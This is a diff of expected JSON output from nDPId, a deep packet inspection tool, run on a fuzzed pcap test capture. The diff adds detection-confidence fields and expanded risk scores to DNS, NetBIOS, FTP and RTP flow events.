 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471077370,"flow_last_seen":1120471078365,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00824{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00713{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}}
+00830{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00821{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00709{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00709{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00825{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
